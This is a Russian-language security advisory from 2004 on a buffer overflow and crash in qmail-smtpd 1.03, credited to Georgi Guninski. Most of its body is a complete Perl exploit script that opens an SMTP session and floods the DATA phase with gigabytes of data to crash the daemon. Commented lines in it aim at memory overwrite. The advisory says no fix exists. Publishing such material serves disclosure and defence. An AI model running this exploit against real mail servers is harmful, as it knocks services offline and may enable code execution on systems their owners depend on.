| Дата публикации: | 18.01.2004 |
| Всего просмотров: | 1508 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: qmail 1.03
Описание: Две уязвимости обнаружены в qmail-smtpd. Удаленный пользователь может вызвать переполнение буфера и перезаписать память на целевой системе. Georgi Guninski сообщил, что удаленный пользователь может подключится к системе с чрезмерно длинной SMTP сессией, чтобы аварийно завершить работу qmail-smtpd сессии. Также удаленный атакующий может вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. Пример/Эксплоит:
#!/usr/bin/perl -w
#Copyright Georgi Guninski\nCannot be used in vulnerability databases and
#similar stuff
use IO::Socket;
my $port = $ARGV[1];
my $host = $ARGV[0];
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";
my $req = "HELO a\r\n";
my $fromaddr="they\@sux.org";
my $touser="postmaster";
print "qmail-smtpd SEGV. Copyright Georgi Guninski\nCannot be used in
vulnerability databases and similar stuff\nWill connect to ${host}:${port}
fromaddr=${fromaddr} touser=${touser}\n";
$req .= "MAIL FROM: ${fromaddr}\r\n";
$req .= "RCPT TO: ${touser}\r\n";
$req .= "DATA\r\n";
$req .= "1234567890";
#my $x = "\ng" x 100;
#print $x;
syswrite($socket,$req,length($req));
my $l1= 1024*1024;
my $p1 = "gg" x $l1;
my $pl = 2*$l1;
print "length=${pl}\n";
my $towrite = $l1*2050;
my $wri = 0;
$req = $p1;
while ($wri < $towrite)
{
syswrite($socket,$req,$pl);
if ( ($wri % $l1) == 0) {print "written=" . $wri/$l1 . "\n";}
# !!! uncomment the following lines to get qmail memory screw on
linux according to gdb
#if ($wri/$l1 == 2044)
#{
#syswrite($socket,"g\r\n",3);print "injected\n";
#};
$wri += $pl;
}
$req = "test\r\n";
$req .= ".\r\n";
syswrite($socket,$req,length($req));
while(<$socket>)
{
print $_;
}
close $socket;
URL производителя: http://www.qmail.org Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | crash in qmail-smtpd and memory overwrite according to gdb, yet still qmail much better than windows |